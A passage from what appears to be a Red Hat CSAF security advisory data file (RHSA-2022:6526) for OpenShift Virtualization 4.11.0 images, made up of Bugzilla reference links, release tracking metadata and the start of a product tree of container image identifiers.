"https://bugzilla.redhat.com/show_bug.cgi?id=2074337", }, { category: "external", summary: "2075200", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2075200", }, { category: "external", summary: "2075409", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2075409", }, { category: "external", summary: "2076292", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2076292", }, { category: "external", summary: "2076379", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2076379", }, { category: "external", summary: "2076790", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2076790", }, { category: "external", summary: "2076908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2076908", }, { category: "external", summary: "2077688", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2077688", }, { category: "external", summary: "2077689", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2077689", }, { category: "external", summary: "2078700", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2078700", }, { category: "external", summary: "2078703", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2078703", }, { category: "external", summary: "2078709", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2078709", }, { category: "external", summary: "2078728", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2078728", }, { category: "external", summary: "2079366", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2079366", }, { category: "external", summary: "2079674", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2079674", }, { category: "external", summary: "2079783", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2079783", }, { category: "external", summary: "2080132", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080132", }, { category: "external", summary: "2080155", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080155", }, { category: "external", summary: "2080547", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080547", }, { category: "external", summary: "2080833", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080833", }, { category: "external", summary: "2080835", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2080835", }, { category: "external", summary: "2081182", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081182", }, { category: "external", summary: "2081202", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081202", }, { category: "external", summary: "2081409", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081409", }, { category: "external", summary: "2081671", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081671", }, { category: "external", summary: "2081831", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2081831", }, { category: "external", summary: "2082008", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2082008", }, { category: "external", summary: "2082164", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2082164", }, { category: "external", summary: "2082912", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2082912", }, { category: "external", summary: "2083093", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083093", }, { category: "external", summary: "2083097", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083097", }, { category: "external", summary: "2083100", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083100", }, { category: "external", summary: "2083101", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083101", }, { category: "external", summary: "2083135", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083135", }, { category: "external", summary: "2083256", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083256", }, { category: "external", summary: "2083595", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2083595", }, { category: "external", summary: "2084102", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084102", }, { category: "external", summary: "2084122", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084122", }, { category: "external", summary: "2084418", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084418", }, { category: "external", summary: "2084431", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084431", }, { category: "external", summary: "2084476", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084476", }, { category: "external", summary: "2084532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084532", }, { category: "external", summary: "2084610", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084610", }, { category: "external", summary: "2085320", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2085320", }, { category: "external", summary: "2085322", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2085322", }, { category: "external", summary: "2086272", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086272", }, { category: "external", summary: "2086278", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086278", }, { category: "external", summary: "2086281", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086281", }, { category: "external", summary: "2086286", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086286", }, { category: "external", summary: "2086293", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086293", }, { category: "external", summary: "2086294", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086294", }, { category: "external", summary: "2086303", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086303", }, { category: "external", summary: "2086479", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086479", }, { category: "external", summary: "2086486", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086486", }, { category: "external", summary: "2086488", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086488", }, { category: "external", summary: "2086769", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086769", }, { category: "external", summary: "2086803", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086803", }, { category: "external", summary: "2086825", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086825", }, { category: "external", summary: "2086849", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2086849", }, { category: "external", summary: "2087188", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087188", }, { category: "external", summary: "2087189", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087189", }, { category: "external", summary: "2087232", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087232", }, { category: "external", summary: "2087546", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087546", }, { category: "external", summary: "2087547", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087547", }, { category: "external", summary: "2087559", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087559", }, { category: "external", summary: "2087566", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087566", }, { category: "external", summary: "2087570", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087570", }, { category: "external", summary: "2087577", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087577", }, { category: "external", summary: "2087578", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087578", }, { category: "external", summary: "2087582", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087582", }, { category: "external", summary: "2087583", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087583", }, { category: "external", summary: "2087584", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087584", }, { category: "external", summary: "2087587", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087587", }, { category: "external", summary: "2087589", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087589", }, { category: "external", summary: "2087590", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087590", }, { category: "external", summary: "2087593", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087593", }, { category: "external", summary: "2087603", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087603", }, { category: "external", summary: "2087616", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087616", }, { category: "external", summary: "2087701", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087701", }, { category: "external", summary: "2087717", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2087717", }, { category: "external", summary: "2088034", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088034", }, { category: "external", summary: "2088355", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088355", }, { category: "external", summary: "2088361", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088361", }, { category: "external", summary: "2088379", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088379", }, { category: "external", summary: "2088407", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088407", }, { category: "external", summary: "2088471", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088471", }, { category: "external", summary: "2088472", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088472", }, { category: "external", summary: "2088477", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088477", }, { category: "external", summary: "2088849", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2088849", }, { category: "external", summary: "2089078", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089078", }, { category: "external", summary: "2089271", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089271", }, { category: "external", summary: "2089327", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089327", }, { category: "external", summary: "2089376", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089376", }, { category: "external", summary: "2089477", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089477", }, { category: "external", summary: "2089700", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089700", }, { category: "external", summary: "2089745", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089745", }, { category: "external", summary: "2089789", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089789", }, { category: "external", summary: "2089825", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089825", }, { category: "external", summary: "2089836", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089836", }, { category: "external", summary: "2089840", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089840", }, { category: "external", summary: "2089877", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089877", }, { category: "external", summary: "2089932", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089932", }, { category: "external", summary: "2089942", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089942", }, { category: "external", summary: "2089954", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089954", }, { category: "external", summary: "2089963", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089963", }, { category: "external", summary: "2089967", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089967", }, { category: "external", summary: "2089970", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089970", }, { category: "external", summary: "2089972", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089972", }, { category: "external", summary: "2089979", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089979", }, { category: "external", summary: "2089982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2089982", }, { category: "external", summary: "2090035", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090035", }, { category: "external", summary: "2090036", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090036", }, { category: "external", summary: "2090037", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090037", }, { category: "external", summary: "2090038", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090038", }, { category: "external", summary: "2090042", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090042", }, { category: "external", summary: "2090043", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090043", }, { category: "external", summary: "2090046", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090046", }, { category: "external", summary: "2090048", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090048", }, { category: "external", summary: "2090054", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090054", }, { category: "external", summary: "2090055", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090055", }, { category: "external", summary: "2090056", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090056", }, { category: "external", summary: "2090057", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090057", }, { category: "external", summary: "2090059", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090059", }, { category: "external", summary: "2090064", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090064", }, { category: "external", summary: "2090066", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090066", }, { category: "external", summary: "2090068", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090068", }, { category: "external", summary: "2090131", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090131", }, { category: "external", summary: "2090350", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2090350", }, { category: "external", summary: "2091003", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091003", }, { category: "external", summary: "2091058", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091058", }, { category: "external", summary: "2091309", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091309", }, { category: "external", summary: "2091406", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091406", }, { category: "external", summary: "2091754", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091754", }, { category: "external", summary: "2091755", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091755", }, { category: "external", summary: "2091756", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091756", }, { category: "external", summary: "2091758", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091758", }, { category: "external", summary: "2091760", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091760", }, { category: "external", summary: "2091761", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091761", }, { category: "external", summary: "2091762", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091762", }, { category: "external", summary: "2091764", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091764", }, { category: "external", summary: "2091765", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091765", }, { category: "external", summary: "2091766", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091766", }, { category: "external", summary: "2091853", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091853", }, { category: "external", summary: "2091863", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091863", }, { category: "external", summary: "2091868", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091868", }, { category: "external", summary: "2091889", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091889", }, { category: "external", summary: "2091897", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091897", }, { category: "external", summary: "2091904", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091904", }, { category: "external", summary: "2091911", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091911", }, { category: "external", summary: "2091940", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091940", }, { category: "external", summary: "2091945", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091945", }, { category: "external", summary: "2091946", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091946", }, { category: "external", summary: "2091982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2091982", }, { category: "external", summary: "2092048", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092048", }, { category: "external", summary: "2092052", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092052", }, { category: "external", summary: "2092071", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092071", }, { category: "external", summary: "2092079", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092079", }, { category: "external", summary: "2092158", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092158", }, { category: "external", summary: "2092228", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092228", }, { category: "external", summary: "2092230", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092230", }, { category: "external", summary: "2092306", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092306", }, { category: "external", summary: "2092337", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092337", }, { category: "external", summary: "2092359", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092359", }, { category: "external", summary: "2092654", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092654", }, { category: "external", summary: "2092662", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092662", }, { category: "external", summary: "2092663", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092663", }, { category: "external", summary: "2092664", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092664", }, { category: "external", summary: "2092781", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092781", }, { category: "external", summary: "2092783", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092783", }, { category: "external", summary: "2092787", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092787", }, { category: "external", summary: "2092789", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092789", }, { category: "external", summary: "2092951", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092951", }, { category: "external", summary: "2093282", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093282", }, { category: "external", summary: "2093691", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093691", }, { category: "external", summary: "2093713", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093713", }, { category: "external", summary: "2093715", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093715", }, { category: "external", summary: "2093716", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093716", }, { category: "external", summary: "2093772", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093772", }, { category: "external", summary: "2093773", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093773", }, { category: "external", summary: "2093866", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093866", }, { category: "external", summary: "2093867", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2093867", }, { category: "external", summary: "2094202", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094202", }, { category: "external", summary: "2094207", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094207", }, { category: "external", summary: "2094208", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094208", }, { category: "external", summary: "2094217", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094217", }, { category: "external", summary: "2094222", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094222", }, { category: "external", summary: "2094323", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094323", }, { category: "external", summary: "2094405", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094405", }, { category: "external", summary: "2094440", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094440", }, { category: "external", summary: "2094451", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094451", }, { category: "external", summary: "2094453", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094453", }, { category: "external", summary: "2094465", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094465", }, { category: "external", summary: "2094471", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094471", }, { category: "external", summary: "2094481", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094481", }, { category: "external", summary: "2094486", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094486", }, { category: "external", summary: "2094491", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094491", }, { category: "external", summary: "2094495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094495", }, { category: "external", summary: "2094646", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094646", }, { category: "external", summary: "2094665", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094665", }, { category: "external", summary: "2094678", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094678", }, { category: "external", summary: "2094727", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094727", }, { category: "external", summary: "2094807", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094807", }, { category: "external", summary: "2094813", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094813", }, { category: "external", summary: "2094848", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2094848", }, { category: "external", summary: "2095125", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095125", }, { category: "external", summary: "2095129", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095129", }, { category: "external", summary: "2095224", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095224", }, { category: "external", summary: "2095529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095529", }, { category: "external", summary: "2095530", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095530", }, { category: "external", summary: "2095532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095532", }, { category: "external", summary: "2095537", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095537", }, { category: "external", summary: "2095570", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095570", }, { category: "external", summary: "2095573", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095573", }, { category: "external", summary: "2095953", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095953", }, { category: "external", summary: "2095955", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2095955", }, { category: "external", summary: "2096166", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096166", }, { category: "external", summary: "2096206", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096206", }, { category: "external", summary: "2096208", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096208", }, { category: "external", summary: "2096263", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096263", }, { category: "external", summary: "2096333", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096333", }, { category: "external", summary: "2096492", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096492", }, { category: "external", summary: "2096502", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096502", }, { category: "external", summary: "2096510", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096510", }, { category: "external", summary: "2096511", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096511", }, { category: "external", summary: "2096620", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096620", }, { category: "external", summary: "2096781", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096781", }, { category: "external", summary: "2096801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096801", }, { category: "external", summary: "2096845", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2096845", }, { category: "external", summary: "2097328", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097328", }, { category: "external", summary: "2097370", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097370", }, { category: "external", summary: "2097465", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097465", }, { category: "external", summary: "2097586", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097586", }, { category: "external", summary: "2098134", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2098134", }, { category: "external", summary: "2098135", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2098135", }, { category: "external", summary: "2098282", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2098282", }, { category: "external", summary: "2099443", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099443", }, { category: "external", summary: "2099533", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099533", }, { category: "external", summary: "2099535", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099535", }, { category: "external", summary: "2099539", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099539", }, { category: "external", summary: "2099566", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099566", }, { category: "external", summary: "2099608", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099608", }, { category: "external", summary: "2099633", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099633", }, { category: "external", summary: "2099639", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099639", }, { category: "external", summary: "2099802", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2099802", }, { category: "external", summary: "2100054", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100054", }, { category: "external", summary: "2100284", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100284", }, { category: "external", summary: "2100415", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100415", }, { category: "external", summary: "2100495", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2100495", }, { category: "external", summary: "2101164", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101164", }, { category: "external", summary: "2101192", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101192", }, { category: "external", summary: "2101430", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101430", }, { category: "external", summary: "2101454", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101454", }, { category: "external", summary: "2101485", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101485", }, { category: "external", summary: "2101628", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101628", }, { category: "external", summary: "2101954", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101954", }, { category: "external", summary: "2102076", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102076", }, { category: "external", summary: "2102116", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102116", }, { category: "external", summary: "2102117", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102117", }, { category: "external", summary: "2102122", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102122", }, { category: "external", summary: "2102124", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102124", }, { category: "external", summary: "2102125", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102125", }, { category: "external", summary: "2102127", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102127", }, { category: "external", summary: "2102129", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102129", }, { category: "external", summary: "2102131", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102131", }, { category: "external", summary: "2102135", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102135", }, { category: "external", summary: "2102143", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102143", }, { category: "external", summary: "2102256", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102256", }, { category: "external", summary: "2102448", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102448", }, { category: "external", summary: "2102543", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102543", }, { category: "external", summary: "2102544", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102544", }, { category: "external", summary: "2102545", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2102545", }, { category: "external", summary: "2104617", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2104617", }, { category: "external", summary: "2106175", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2106175", }, { category: "external", summary: "2106258", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2106258", }, { category: "external", summary: "2110178", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2110178", }, { category: "external", summary: "2111359", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111359", }, { category: "external", summary: "2111562", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2111562", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6526.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.11.0 Images security and bug fix update", tracking: { current_release_date: "2025-05-02T16:09:51+00:00", generator: { date: "2025-05-02T16:09:51+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.3", }, }, id: "RHSA-2022:6526", initial_release_date: "2022-09-14T19:28:51+00:00", revision_history: [ { date: "2022-09-14T19:28:51+00:00", number: "1", summary: "Initial version", }, { date: "2022-09-14T19:28:51+00:00", number: "2", summary: "Last updated version", }, { date: "2025-05-02T16:09:51+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.11 for RHEL 8", product: { name: "CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.11::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", product: { name: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", product_id: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", product_identification_helper: { purl: "pkg:oci/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/bridge-marker&tag=v4.11.0-26", }, }, }, { category: "product_version", name: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", product: { name: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", product_id: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", product_identification_helper: { purl: "pkg:oci/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/checkup-framework&tag=v4.11.0-67", }, }, }, { category: "product_version", name: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", product: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", product_id: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", product_identification_helper: { purl: "pkg:oci/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator&tag=v4.11.0-26", }, }, }, { category: "product_version", name: 